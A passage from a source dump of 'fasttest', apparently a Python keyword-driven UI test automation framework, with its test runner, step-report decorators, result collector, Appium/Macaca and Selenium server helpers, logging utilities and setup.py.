                    devices = DevicesUtils(Var.desired_caps.platformName, Var.desired_caps.udid[self._index])
                    Var.desired_caps['udid'], info = devices.device_info()
                else:
                    raise Exception('the udid list is not configured properly.')
            else:
                # Single worker: accept list, scalar or missing udid.
                if isinstance(Var.desired_caps.udid, list):
                    if Var.desired_caps.udid:
                        devices = DevicesUtils(Var.desired_caps.platformName, Var.desired_caps.udid[0])
                    else:
                        devices = DevicesUtils(Var.desired_caps.platformName, None)
                else:
                    devices = DevicesUtils(Var.desired_caps.platformName, Var.desired_caps.udid)
                Var.desired_caps['udid'], info = devices.device_info()
        else:
            info = Var.desired_caps.browser
        # Report folder name: <device-or-browser>_<timestamp>_<thread>.
        thr_name = threading.currentThread().getName()
        report_time = time.strftime("%Y%m%d%H%M%S", time.localtime(time.time()))
        report_child = "{}_{}_{}".format(info, report_time, thr_name)
        Var.report = os.path.join(Var.root, "Report", report_child)
        if not os.path.exists(Var.report):
            os.makedirs(Var.report)
            os.makedirs(os.path.join(Var.report, 'resource'))
    def _analytical_testcase_file(self):
        """Log the effective configuration and collect the testcase files."""
        log_info('******************* analytical config *******************')
        for configK, configV in self._config.items():
            log_info(' {}: {}'.format(configK, configV))
        log_info('******************* analytical testcase *******************')
        testcase = TestCaseUtils()
        self._testcase = testcase.test_case_path(Var.root, Var.test_case)
        log_info(' case: {}'.format(len(self._testcase)))
        for case in self._testcase:
            log_info(' {}'.format(case))
    def _analytical_common_file(self):
        """Load Common/ function definitions: the top-level directory plus
        the subdirectory matching the current platformName."""
        log_info('******************* analytical common *******************')
        common_dir = os.path.join(Var.root, "Common")
        for rt, dirs, files in os.walk(common_dir):
            if rt == common_dir:
                self._load_common_func(rt, files)
            elif Var.desired_caps.platformName and (rt.split(os.sep)[-1].lower() == Var.desired_caps.platformName.lower()):
                self._load_common_func(rt, files)
        for commonk, commonv in Var.common_func.items():
            log_info(' {}: {}'.format(commonk, commonv))
    def _load_common_func(self,rt ,files):
        """Merge every *.yaml file under *rt* into Var.common_func."""
        for f in files:
            if not f.endswith('yaml'):
                continue
            for commonK, commonV in analytical_file(os.path.join(rt, f)).items():
                Var.common_func[commonK] = commonV
    def _init_data(self):
        """Load data.yaml: global variables, resource paths and extra
        keyword modules."""
        data = analytical_file(os.path.join(Var.root, 'data.yaml'))
        dict = Dict(data)
        Var.extensions_var['variable'] = dict.variable
        Var.extensions_var['resource'] = dict.resource
        Var.extensions_var['keywords'] = dict.keywords
        if not Var.extensions_var.variable:
            Var.extensions_var['variable'] = Dict()
        if not Var.extensions_var.resource:
            Var.extensions_var['resource'] = Dict()
        if not Var.extensions_var.keywords:
            Var.extensions_var['keywords'] = Dict()
        # Register global variables.
        log_info('******************* register variable *******************')
        for key, value in Var.extensions_var.variable.items():
            Var.extensions_var.variable[key] = value
            log_info(' {}: {}'.format(key, value))
        # Resolve resource file paths relative to the project root.
        log_info('******************* register resource *******************')
        for resource, path in Var.extensions_var.resource.items():
            resource_file = os.path.join(Var.root, path)
            if not os.path.isfile(resource_file):
                log_error('No such file or directory: {}'.format(resource_file), False)
                continue
            Var.extensions_var.resource[resource] = resource_file
            log_info(' {}: {}'.format(resource, resource_file))
        # Register keywords (built-in for the driver plus user-declared).
        log_info('******************* register keywords *******************')
        Var.default_keywords_data = keywords.return_keywords(Var.driver)
        Var.new_keywords_data = Var.extensions_var.keywords
        for key in Var.extensions_var.keywords:
            log_info(' {}'.format(key))
    def _init_testcase_suite(self):
        """Slice the testcases for this worker and build the unittest suite."""
        self._suite = []
        # When there are more workers than cases, shrink to the case count.
        # NOTE(review): this condition compares self._index, not
        # self._workers, which the comment implies — looks like a typo;
        # confirm the intended variable before changing.
        if 1 < self._index > len(self._testcase):
            self._workers = len(self._testcase)
        if self._index == len(self._testcase):
            return
        if self._workers > 1:
            # Even slice [i/n, (i+1)/n) of the case list for worker i of n.
            i = self._index
            n = self._workers
            l = len(self._testcase)
            self._testcase = self._testcase[math.floor(i / n * l):math.floor((i + 1) / n * l)]
        for case_path in self._testcase:
            test_case = analytical_file(case_path)
            test_case['test_case_path'] = case_path
            Var.case_info = test_case
            subsuite = unittest.TestLoader().loadTestsFromTestCase(RunCase)
            self._suite.append(subsuite)
            Var.case_info = None
    def start(self):
        """Launch the driver server, execute the suite, stop the server and
        print failed/errored cases; returns the aggregate result (or None
        when this worker has no cases)."""
        if not self._suite:
            return None
        # Assemble the launch parameters.
        log_info('******************* analytical desired capabilities *******************')
        Var.desired_capabilities = Dict({
            'driver': Var.driver.lower(),
            'timeOut': Var.time_out,
            'desired': Var.desired_caps,
            'index': self._index,
            'root': self._root
        })
        # Start the server.
        if Var.driver != 'selenium':
            server = ServerUtilsApp(Var.desired_capabilities)
            Var.instance = server.start_server()
        elif not Var.re_start:
            server = ServerUtilsWeb(Var.desired_capabilities)
            Var.instance = server.start_server()
            DriverBaseWeb.init()
        else:
            server = None
        # Run the cases.
        suite = unittest.TestSuite(tuple(self._suite))
        runner = TestRunner()
        runner.run(suite)
        # Stop the server.
        if Var.driver != 'selenium':
            server.stop_server()
        elif not Var.re_start:
            server.stop_server(Var.instance)
        # Print failed results.
        if Var.all_result:
            if Var.all_result.errorsList:
                log_info(' Error case:')
                for error in Var.all_result.errorsList:
                    log_error(error, False)
            if Var.all_result.failuresList:
                log_info(' Failed case:')
                for failure in Var.all_result.failuresList:
                    log_error(failure, False)
        return Var.all_result
Hanlen520/fasttest | fasttest/common/decorator.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
try:
import cv2
except:
pass
import time
from fasttest.common import *
def mach_keywords(func, *args, **kwds):
    """Decorator for keyword-matching steps.

    On success the wrapped call is transparent. On failure it records a
    report entry (screenshot path, duration, step text) into
    Var.test_case_steps before re-raising, so the HTML report can show the
    failing step.
    """
    import functools

    @functools.wraps(func)  # preserve the wrapped callable's metadata
    def wrapper(*args, **kwds):
        start_time = time.time()
        result = None
        try:
            # Original dispatched on `if args or kwds`; func(*args, **kwds)
            # is equivalent for the empty case too.
            result = func(*args, **kwds)
        except Exception as e:
            Var.case_snapshot_index += 1
            Var.exception_flag = False
            snapshot_index = Var.case_snapshot_index
            imagename = "Step_{}.png".format(snapshot_index)
            file = os.path.join(Var.snapshot_dir, imagename)
            # NOTE(review): assumes the step text is the second positional
            # argument and the style string the last — confirm at call sites.
            action_step = args[1]
            style = args[-1]
            try:
                Var.instance.save_screenshot(file)
            except:
                log_error(' screenshot failed!', False)
            stop_time = time.time()
            duration = str('%.2f' % (stop_time - start_time))
            # A failing statement inside a `call` action also marks the call
            # action failed; Var.exception_flag distinguishes that case.
            status = False
            if Var.exception_flag:
                status = True
            Var.test_case_steps[snapshot_index] = {
                'index': snapshot_index,
                'status': status,
                'duration': duration,
                'snapshot': file,
                'step': f'{style}- {action_step}',
                'result': result if result is not None else ''
            }
            raise e
        return result
    return wrapper
def executor_keywords(func, *args, **kwds):
    """Decorator for executable keyword steps.

    Every invocation (success or failure) is recorded into
    Var.test_case_steps with index, status, duration, screenshot path and
    the step's result; the original exception, if any, is re-raised after
    the record is written.
    """
    import functools

    @functools.wraps(func)  # preserve the wrapped callable's metadata
    def wrapper(*args, **kwds):
        result = None
        exception_flag = False
        exception = None
        Var.ocrimg = None
        start_time = time.time()
        Var.case_snapshot_index += 1
        Var.exception_flag = False
        snapshot_index = Var.case_snapshot_index
        imagename = "Step_{}.png".format(snapshot_index)
        file = os.path.join(Var.snapshot_dir, imagename)
        # NOTE(review): assumes the action object is the second-to-last
        # positional argument and the style string the last — confirm.
        action_step = args[-2].step
        style = args[-1]
        try:
            # Original dispatched on `if args or kwds`; func(*args, **kwds)
            # is equivalent for the empty case too.
            result = func(*args, **kwds)
        except Exception as e:
            exception = e
            exception_flag = True
        finally:
            try:
                if Var.ocrimg is not None:
                    # matchImage produced an annotated image — persist it.
                    cv2.imwrite(file, Var.ocrimg)
                    Var.ocrimg = None
                elif Var.save_screenshot:
                    # Global "screenshot every step" switch.
                    Var.instance.save_screenshot(file)
                elif not Var.exception_flag and exception_flag:
                    # Screenshot only on a real (non-`call`) failure.
                    Var.instance.save_screenshot(file)
            except:
                Var.ocrimg = None
                log_error(' screenshot failed!', False)
            # Step duration.
            stop_time = time.time()
            duration = str('%.2f' % (stop_time - start_time))
            # Step result; angle brackets would break the HTML report markup.
            if result is not None:
                action_result = f'{result}'.replace("<", "{").replace(">", "}")
            else:
                action_result = ''
            # A failing statement inside a `call` action also marks the call
            # action failed; Var.exception_flag distinguishes that case.
            status = not exception_flag
            if Var.exception_flag:
                status = True
            Var.test_case_steps[snapshot_index] = {
                'index': snapshot_index,
                'status': status,
                'duration': duration,
                'snapshot': file,
                'step': f'{style}- {action_step}',
                'result': action_result
            }
        if exception_flag:
            raise exception
        return result
    return wrapper
Hanlen520/fasttest | fasttest/utils/__init__.py | <reponame>Hanlen520/fasttest
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from fasttest.utils.yaml_utils import analytical_file
from fasttest.utils.devices_utils import DevicesUtils
from fasttest.utils.opcv_utils import OpencvUtils
from fasttest.utils.server_utils_app import ServerUtilsApp
from fasttest.utils.server_utils_web import ServerUtilsWeb
from fasttest.utils.testcast_utils import TestCaseUtils
__all__ = ['analytical_file', 'DevicesUtils', 'OpencvUtils', 'ServerUtilsApp', 'ServerUtilsWeb', 'TestCaseUtils'] |
Hanlen520/fasttest | fasttest/result/test_result.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import time
import unittest
import collections
from fasttest.common import *
class TestInfo(object):
    """
    This class keeps useful information about the execution of a
    test method: outcome, timing, report location and per-step records.
    """
    # Possible test outcomes
    (SUCCESS, FAILURE, ERROR, SKIP) = range(4)
    def __init__(self, test_method, status=SUCCESS, err=None):
        """
        :param test_method: executed case object exposing test_case_path,
            snapshot_dir, module and description attributes
        :param status: one of SUCCESS / FAILURE / ERROR / SKIP
        :param err: formatted traceback string for failed/errored cases
        """
        self.status = status
        self.elapsed_time = 0
        self.start_time = 0
        self.stop_time = 0
        self.err = err
        self.report = None
        self.case_path = test_method.test_case_path
        # Case file name without directories or extension; the original
        # duplicated this expression for data_id and case_name.
        base_name = test_method.test_case_path.split('/')[-1].split(os.sep)[-1].split(".")[0]
        self.data_id = base_name
        self.case_name = base_name
        self.snapshot_dir = test_method.snapshot_dir
        self.module_name = test_method.module
        self.description = test_method.description
        # Filled in by TestResult.stopTest with the per-step report dicts.
        self.test_case_steps = {}
class TestResult(unittest.TextTestResult):
    """TextTestResult subclass that builds per-case TestInfo records,
    grouped by module, for the HTML report."""
    def __init__(self,stream, descriptions, verbosity):
        super(TestResult,self).__init__(stream,descriptions,verbosity)
        self.stream = stream
        self.showAll = verbosity > 1
        self.descriptions = descriptions
        # Ordered mapping: module name -> [TestInfo, ...]
        self.result = collections.OrderedDict()
        self.successes = []
        # TestInfo of the case currently being finalized; set by the
        # add* hooks, consumed and cleared by stopTest.
        self.testinfo = None
    def _save_output_data(self):
        '''
        Snapshot the buffered case log and reset the per-case counters.
        :return:
        '''
        try:
            self._stdout_data = Var.case_message
            Var.case_message = ""
            Var.case_step_index = 0
            Var.case_snapshot_index = 0
        except AttributeError as e:
            # Best effort — Var may not carry case_message outside a run.
            pass
    def startTest(self, test):
        '''
        Reset the per-case step store before the case runs.
        :param test:
        :return:
        '''
        super(TestResult,self).startTest(test)
        self.start_time = time.time()
        Var.test_case_steps = {}
        Var.is_debug = False
    def stopTest(self, test):
        '''
        Finalize the TestInfo created by the add* hook and file it under
        the case's module.
        :param test:
        :return:
        '''
        self._save_output_data()
        unittest.TextTestResult.stopTest(self,test)
        self.stop_time = time.time()
        self.report = test.report
        self.testinfo.start_time = self.start_time
        self.testinfo.stop_time = self.stop_time
        self.testinfo.report = self.report
        self.testinfo.test_case_steps = Var.test_case_steps
        if test.module not in self.result.keys():
            self.result[test.module] = []
        self.result[test.module].append(self.testinfo)
        self.testinfo = None
        Var.test_case_steps = {}
        Var.is_debug = False
    def addSuccess(self, test):
        '''
        Record a passing case.
        :param test:
        :return:
        '''
        super(TestResult,self).addSuccess(test)
        self._save_output_data()
        self.testinfo = TestInfo(test, TestInfo.SUCCESS)
        self.successes.append(test)
    def addError(self, test, err):
        '''
        Record an errored case and log its traceback.
        :param test:
        :return:
        '''
        super(TestResult,self).addError(test,err)
        self._save_output_data()
        _exc_str = self._exc_info_to_string(err, test)
        self.testinfo = TestInfo(test, TestInfo.ERROR, _exc_str)
        log_error(' case: {}'.format(self.testinfo.case_path), False)
        log_error(_exc_str, False)
    def addFailure(self, test, err):
        '''
        Record a failed case and log its traceback.
        :param test:
        :return:
        '''
        super(TestResult,self).addFailure(test,err)
        self._save_output_data()
        _exc_str = self._exc_info_to_string(err, test)
        self.testinfo = TestInfo(test, TestInfo.FAILURE, _exc_str)
        log_error(' case: {}'.format(self.testinfo.case_path), False)
        log_error(_exc_str, False)
    def addSkip(self, test, reason):
        '''
        Record a skipped case.
        :param test:
        :return:
        '''
        super(TestResult,self).addSkip(test,reason)
        self._save_output_data()
        self.testinfo = TestInfo(test, TestInfo.SKIP)
    def addExpectedFailure(self, test, err):
        '''
        Record an expected failure.
        NOTE(review): this delegates to TextTestResult.addFailure (not
        addExpectedFailure), so @expectedFailure cases are counted as plain
        failures — confirm whether that is intentional before changing.
        :param test:
        :param err:
        :return:
        '''
        super(TestResult, self).addFailure(test, err)
        self._save_output_data()
        _exc_str = self._exc_info_to_string(err, test)
        self.testinfo = TestInfo(test, TestInfo.FAILURE, _exc_str)
        log_error(' case: {}'.format(self.testinfo.case_path), False)
        log_error(_exc_str, False)
|
Hanlen520/fasttest | fasttest/common/__init__.py | <gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from fasttest.common.dict import Dict, DictEncoder
from fasttest.common.variable_global import Var
from fasttest.common.log import log_info, log_error
__all__ = ['log_info','log_error','Var', 'Dict', 'DictEncoder']
|
Hanlen520/fasttest | fasttest/utils/server_utils_app.py | <gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import time
import random
import platform
import threading
import subprocess
from fasttest.common import *
class ServerUtilsApp(object):
    """Starts and stops the appium/macaca server process for one device and
    creates the corresponding webdriver session."""
    def __getattr__(self, item):
        # Unknown attributes resolve to None instead of raising, because
        # desired-capability keys are mirrored onto the instance in
        # _check_desired_capabilities and may be absent.
        try:
            return self.__getattribute__(item)
        except:
            return None
    def __init__(self, desired_capabilities):
        # desired_capabilities: Dict with driver, timeOut and the raw
        # desired capabilities from config.yaml.
        self.instance = None
        self.driver = desired_capabilities.driver
        self.time_out = desired_capabilities.timeOut
        self.url = 'http://127.0.0.1'
        self.desired_capabilities = self._check_desired_capabilities(desired_capabilities.desired)
        self.port = self._get_device_port()
        # NOTE(review): `browser` is a web setting; for app drivers this
        # normally resolves to None — confirm it is ever used here.
        self.browser = desired_capabilities.browser
    def start_server(self):
        """Spawn the appium (or macaca) server on a free port and return a
        connected webdriver instance; on failure, clean up helper apks on
        Android, stop the server and re-raise."""
        try:
            log_info('Start the server...')
            self.stop_server()
            if self.driver == 'appium':
                bp_port = self._get_device_port()
                wda_port = self._get_device_port()
                udid = self.desired_capabilities['udid']
                p = f'appium ' \
                    f'-a 127.0.0.1 ' \
                    f'-p {self.port} ' \
                    f'-U {udid} ' \
                    f'-bp {bp_port} ' \
                    f'--webdriveragent-port {wda_port} ' \
                    f'--session-override ' \
                    f'--log-level info'
                self.pipe = subprocess.Popen(p, stdout=subprocess.PIPE, shell=True)
                # Stream appium output on a daemon-less helper thread.
                thread = threading.Thread(target=self._print_appium_log)
                thread.start()
                # Give the server time to come up before connecting.
                time.sleep(5)
                from appium import webdriver
                self.instance = webdriver.Remote(command_executor='{}:{}/wd/hub'.format(self.url, self.port),
                                                 desired_capabilities=self.desired_capabilities)
                self.instance.implicitly_wait(int(self.time_out))
            else:
                # macaca: block until its startup banner appears.
                ob = subprocess.Popen('macaca server -p {}'.format(self.port), stdout=subprocess.PIPE, shell=True)
                for out_ in ob.stdout:
                    out_ = str(out_, encoding='utf-8')
                    log_info(out_.strip())
                    if 'Macaca server started' in out_: break
                from macaca import WebDriver
                self.instance = WebDriver(url='{}:{}/wd/hub'.format(self.url, self.port),
                                          desired_capabilities=self.desired_capabilities)
                self.instance.init()
            return self.instance
        except Exception as e:
            log_error('Unable to connect to the server, please reconnect!', False)
            if self.platformName.lower() == "android":
                # Remove stale automation helper apks so the next attempt
                # reinstalls them cleanly.
                # NOTE(review): the macaca branch uninstalls the appium
                # uiautomator2 packages and vice versa — confirm the
                # condition is not inverted.
                if self.driver == 'macaca':
                    os.system('adb uninstall io.appium.uiautomator2.server')
                    os.system('adb uninstall io.appium.uiautomator2.server.test')
                else:
                    os.system('adb uninstall com.macaca.android.testing')
                    os.system('adb uninstall com.macaca.android.testing.test')
                os.system('adb uninstall xdf.android_unlock')
            self.stop_server()
            raise e
    def stop_server(self):
        """Force-stop the app under test, quit the session and kill any
        process still listening on our port."""
        try:
            if self.platformName.lower() == "android":
                os.system('adb -s {} shell am force-stop {}'.format(self.udid,
                                                                    self.package if self.package else self.appPackage))
            elif self.platformName.lower() == "ios":
                pass
            try:
                self.instance.quit()
            except:
                pass
            if self.port is not None:
                result, pid = self._check_port_is_used(self.port)
                if result:
                    p = platform.system()
                    if p == "Windows":
                        sys_command = "taskkill /pid %s -t -f" % pid
                        info = subprocess.check_output(sys_command)
                        log_info(str(info, encoding='GB2312'))
                    elif p == "Darwin" or p == "Linux":
                        sys_command = "kill -9 %s" % pid
                        os.system(sys_command)
        except Exception as e:
            raise e
    def _check_desired_capabilities(self, desired_capabilities):
        """Normalize capability keys for the selected driver (appium wants
        appPackage/appActivity, macaca wants package/activity), mirror each
        key onto this instance and return the plain dict for the driver."""
        desired_capabilities_dict = {}
        for key, value in desired_capabilities.items():
            if self.driver == 'appium':
                if key in ['package', 'appPackage']:
                    key = 'appPackage'
                elif key in ['activity', 'appActivity']:
                    key = 'appActivity'
            else:
                if key in ['package', 'appPackage']:
                    key = 'package'
                elif key in ['activity', 'appActivity']:
                    key = 'activity'
            if isinstance(value, Dict):
                # Flatten project Dict values into plain dicts.
                value_dict = {}
                for key_, value_ in value.items():
                    value_dict[key_] = value_
                value = value_dict
            desired_capabilities_dict[key] = value
            log_info(' {}: {}'.format(key, value))
            object.__setattr__(self, key, value)
        return desired_capabilities_dict
    def _check_port_is_used(self, port):
        """Return (True, pid) when *port* has a listener, else (False, None).
        Uses netstat on Windows and lsof on Darwin/Linux."""
        p = platform.system()
        if p == 'Windows':
            sys_command = "netstat -ano|findstr %s" % port
            pipe = subprocess.Popen(sys_command, stdout=subprocess.PIPE, shell=True)
            out, error = pipe.communicate()
            if str(out, encoding='utf-8') != "" and "LISTENING" in str(out, encoding='utf-8'):
                pid = re.search(r"\s+LISTENING\s+(\d+)\r\n", str(out, encoding='utf-8')).groups()[0]
                return True, pid
            else:
                return False, None
        elif p == 'Darwin' or p == 'Linux':
            sys_command = "lsof -i:%s" % port
            pipe = subprocess.Popen(sys_command, stdout=subprocess.PIPE, shell=True)
            for line in pipe.stdout.readlines():
                if "LISTEN" in str(line, encoding='utf-8'):
                    pid = str(line, encoding='utf-8').split()[1]
                    return True, pid
            return False, None
        else:
            # log_error exits the process by default; no return value here.
            log_error('The platform is {} ,this platform is not support.'.format(p))
    def _get_device_port(self):
        """Pick a random free port in [3456, 9999]; after 10 busy picks fall
        back to 3456 (NOTE: the fallback is not re-checked for availability)."""
        for i in range(10):
            port = random.randint(3456, 9999)
            result, pid = self._check_port_is_used(port)
            if result:
                continue
            else:
                log_info('get port return {}'.format(port))
                return port
        return 3456
    def _print_appium_log(self):
        """Forward appium's stdout to the project log until startup has
        been announced and the output goes quiet."""
        log_tag = False
        while True:
            out = self.pipe.stdout.readline()
            out = str(out, encoding='utf-8').strip()
            if 'Appium REST http interface' in out:
                log_tag = True
                log_info(out)
            elif out:
                if not log_tag:
                    log_info(out)
            else:
                break
|
Hanlen520/fasttest | setup.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#############################################
# File Name: setup.py
# Author: IMJIE
# Email: <EMAIL>
# Created Time: 2020-1-29
#############################################
import sys
import setuptools
# Long description shown on PyPI, taken from the project README.
with open("README.md", "r", encoding='UTF-8') as fh:
    long_description = fh.read()
info = sys.version_info
# Python <= 3.7 pins the last opencv-contrib release with cp37 wheels;
# newer interpreters take the latest available build.
if info.major == 3 and info.minor <= 7:
    requires = [
        'PyYAML>=5.1.2',
        'wd>=1.0.1',
        'selenium',
        'colorama',
        'opencv-contrib-python==3.4.2.16'
    ]
else:
    requires = [
        'PyYAML>=5.1.2',
        'wd>=1.0.1',
        'selenium',
        'colorama',
        'opencv-contrib-python'
    ]
setuptools.setup(
    name="fasttest",
    version="1.0.0",
    author="IMJIE",
    author_email="<EMAIL>",
    keywords=('macaca', 'appium', 'selenium', 'APP自动化', 'WEB自动化', '关键字驱动'),
    description="关键字驱动自动化框架",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/Jodeee/fasttest",
    packages=setuptools.find_packages(),
    include_package_data=True,
    # NOTE(review): package_data keys are normally dotted package names
    # ('fasttest.result'), not slash paths — verify the report resources
    # actually end up in the wheel.
    package_data={'fasttest/result':['resource/*']},
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
    ],
    python_requires='>=3.6',
    install_requires=requires,
    # Console entry point: the `fasttest` command.
    entry_points={
        'console_scripts':[
            'fasttest = fasttest.fasttest_runner:main'
        ]
    }
)
Hanlen520/fasttest | fasttest/common/dict.py | <filename>fasttest/common/dict.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import json
import collections
try:
from appium.webdriver import WebElement
except:
pass
try:
from macaca.webdriver import WebElement
except:
pass
class Dict(collections.UserDict):
    """String-keyed mapping used throughout the project.

    Unknown keys and attributes resolve to None instead of raising, and any
    plain dict assigned as a value is recursively wrapped as a Dict so
    nested lookups can use attribute access (d.a.b).
    """

    def __missing__(self, key):
        # Absent key -> None rather than KeyError.
        return None

    def __contains__(self, item):
        # Keys are always stored stringified; compare the same way.
        return str(item) in self.data

    def __setitem__(self, key, value):
        if isinstance(value, dict):
            # Wrap nested plain dicts item by item (recursively).
            wrapped = Dict()
            for sub_key, sub_value in value.items():
                wrapped[sub_key] = sub_value
            self.data[str(key)] = wrapped
        else:
            self.data[str(key)] = value

    def __getattr__(self, item):
        # Attribute access falls back to key lookup; None when absent.
        return self[str(item)] if item in self else None

    def __copy__(self):
        # Shallow copy sharing this instance's attribute dict, as
        # UserDict.copy() expects for subclasses.
        clone = type(self)()
        clone.__dict__.update(self.__dict__)
        return clone
class DictEncoder(json.JSONEncoder):
    """JSON encoder aware of the project `Dict` type and, when the
    appium/macaca bindings are installed, their WebElement objects."""

    def default(self, obj):
        """Serialize Dict as a plain dict and WebElement as its string
        form; defer everything else to the base encoder."""
        if isinstance(obj, Dict):
            return {k: v for k, v in obj.items()}
        # WebElement is only bound when the appium or macaca import at
        # module top succeeded; guard so encoding still works when neither
        # driver package is installed.
        try:
            if isinstance(obj, WebElement):
                return str(obj)
        except NameError:
            pass
        return json.JSONEncoder.default(self, obj)
|
Hanlen520/fasttest | fasttest/common/log.py | <filename>fasttest/common/log.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import datetime
import platform
from colorama import init, Fore, Back, Style
from fasttest.common import *
# Module-level logger placeholder (not populated by this module).
logger = None
# colorama initialization: non-Windows terminals get wrap=True first;
# NOTE(review): init() is then called again unconditionally, so the
# autoreset=True call is the one in effect everywhere — confirm intent.
if platform.system() != 'Windows':
    init(wrap=True)
init(autoreset=True)
def write(message):
    """Best-effort append of *message* to <report>/project.log.

    Any failure (missing report dir, unset Var.report, I/O error) is
    silently ignored so logging never breaks a test run.
    """
    try:
        target = os.path.join(Var.report, "project.log")
        with open(target, 'a+', encoding='UTF-8') as log_file:
            log_file.write(f'{message}\n')
    except:
        pass
def log_info(message, color=None):
    """Print *message* with an INFO timestamp prefix and append the
    uncolored form to the project log file.

    :param color: optional colorama color code prepended to the console
        output only.
    """
    prefix = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S INFO :")
    text = message if isinstance(message, str) else str(message)
    if color:
        print(prefix + color + text)
    else:
        print(prefix + text)
    write(prefix + text)
def log_error(message, exit=True):
    """Print *message* in red with an ERROR timestamp prefix, append it to
    the project log, and (by default) terminate the process.

    NOTE(review): termination uses os._exit(0) — a zero exit status on
    error; confirm callers/CI do not rely on a nonzero code.
    """
    prefix = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S ERROR :")
    print(prefix + Fore.RED + message)
    write(prefix + message)
    if exit:
        os._exit(0)
|
Hanlen520/fasttest | fasttest/utils/server_utils_web.py | <reponame>Hanlen520/fasttest
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from selenium import webdriver
from fasttest.common import *
class ServerUtilsWeb(object):
    """Creates (and quits) the Selenium webdriver session for one worker,
    either against a remote hub or a local browser driver."""
    def __getattr__(self, item):
        # Unknown attributes resolve to None instead of raising, since
        # most settings are optional config keys.
        try:
            return self.__getattribute__(item)
        except:
            return None
    def __init__(self, desired_capabilities):
        # desired_capabilities: Dict with driver, timeOut, worker index,
        # project root and the raw desired capabilities from config.yaml.
        self.instance = None
        self.driver = desired_capabilities.driver
        self.time_out = desired_capabilities.timeOut
        self.desired_capabilities = desired_capabilities.desired
        self.index = desired_capabilities.index
        self.root = desired_capabilities.root
        self.browser = self.desired_capabilities.browser
        self.max_window = self.desired_capabilities.maxWindow
        # hub url: a single string serves worker 0 only; a list is indexed
        # by worker number.
        remote_url = self.desired_capabilities.remoteUrl
        if remote_url and isinstance(remote_url, str):
            self.remote_url = remote_url if self.index == 0 else None
        elif remote_url and isinstance(remote_url, list):
            self.remote_url = remote_url[self.index] if self.index < len(remote_url) else None
        else:
            self.remote_url = None
        # driver path: per-browser executable, absolute or project-relative.
        if self.desired_capabilities[self.browser] and 'driver' in self.desired_capabilities[self.browser].keys():
            self.driver_path = self.desired_capabilities[self.browser]['driver']
            if not os.path.isfile(self.driver_path):
                self.driver_path = os.path.join(self.root, self.driver_path)
        else:
            self.driver_path = None
        # options: per-browser command-line argument list.
        if self.desired_capabilities[self.browser] and 'options' in self.desired_capabilities[self.browser].keys():
            self.options = self.desired_capabilities[self.browser]['options']
        else:
            self.options = None
    def start_server(self):
        """Instantiate the webdriver for the configured browser (remote hub
        when remote_url is set, local driver otherwise), maximize the window
        if requested, and return the instance.
        NOTE(review): chrome_options/firefox_options and executable_path
        keyword arguments are deprecated in newer Selenium releases —
        confirm the pinned selenium version before upgrading."""
        try:
            if self.browser == 'chrome':
                options = webdriver.ChromeOptions()
                if self.options:
                    for opt in self.options:
                        options.add_argument(opt)
                if self.remote_url:
                    self.instance = webdriver.Remote(command_executor=self.remote_url,
                                                     desired_capabilities={
                                                         'platform': 'ANY',
                                                         'browserName': self.browser,
                                                         'version': '',
                                                         'javascriptEnabled': True
                                                     },
                                                     options=options)
                else:
                    if self.driver_path:
                        self.instance = webdriver.Chrome(executable_path=self.driver_path,
                                                         chrome_options=options)
                    else:
                        self.instance = webdriver.Chrome(chrome_options=options)
            elif self.browser == 'firefox':
                options = webdriver.FirefoxOptions()
                if self.options:
                    for opt in self.options:
                        options.add_argument(opt)
                if self.remote_url:
                    self.instance = webdriver.Remote(command_executor=self.remote_url,
                                                     desired_capabilities={
                                                         'platform': 'ANY',
                                                         'browserName': self.browser,
                                                         'version': '',
                                                         'javascriptEnabled': True
                                                     },
                                                     options=options)
                else:
                    if self.driver_path:
                        self.instance = webdriver.Firefox(executable_path=self.driver_path,
                                                          firefox_options=options)
                    else:
                        self.instance = webdriver.Firefox(firefox_options=options)
            elif self.browser == 'edge':
                if self.driver_path:
                    self.instance = webdriver.Edge(executable_path=self.driver_path)
                else:
                    self.instance = webdriver.Edge()
            elif self.browser == 'safari':
                self.instance = webdriver.Safari()
            elif self.browser == 'ie':
                if self.driver_path:
                    self.instance = webdriver.Ie(executable_path=self.driver_path)
                else:
                    self.instance = webdriver.Ie()
            elif self.browser == 'opera':
                if self.driver_path:
                    self.instance = webdriver.Opera(executable_path=self.driver_path)
                else:
                    self.instance = webdriver.Opera()
            elif self.browser == 'phantomjs':
                if self.driver_path:
                    self.instance = webdriver.PhantomJS(executable_path=self.driver_path)
                else:
                    self.instance = webdriver.PhantomJS()
            if self.max_window:
                self.instance.maximize_window()
            return self.instance
        except Exception as e:
            raise e
    def stop_server(self, instance):
        """Best-effort quit of the given webdriver instance (errors are
        ignored; the browser may already be gone)."""
        try:
            instance.quit()
        except:
            pass
|
Hanlen520/fasttest | fasttest/runner/action_analysis.py | <gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import json
from colorama import Fore, Back, Style
from fasttest.common import Var, Dict, log_info
from fasttest.common.decorator import mach_keywords, executor_keywords
from fasttest.runner.action_executor_app import ActionExecutorApp
from fasttest.runner.action_executor_web import ActionExecutorWeb
class ActionAnalysis(object):
    """Parses one test-case step string (keyword call, variable assignment,
    ``call`` / ``for`` / ``if`` syntax) and dispatches the parsed action to
    the platform executor, chosen from ``Var.driver`` (app vs. selenium web).
    """
    def __init__(self):
        # values assigned by previous ``${name} = ...`` steps
        self.variables = {}
        # loop variables of the currently running ``for`` block
        self.for_variables = {}
        if Var.driver != 'selenium':
            self.action_executor = ActionExecutorApp()
        else:
            self.action_executor = ActionExecutorWeb()
    def _get_variables(self, name):
        '''
        Resolve a ``${name}`` reference.  Lookup order: for-loop variables,
        step variables, ``call`` arguments (``self.common_var``), extension
        variables, extension resources.
        :param name: literal reference text, e.g. ``${user}``
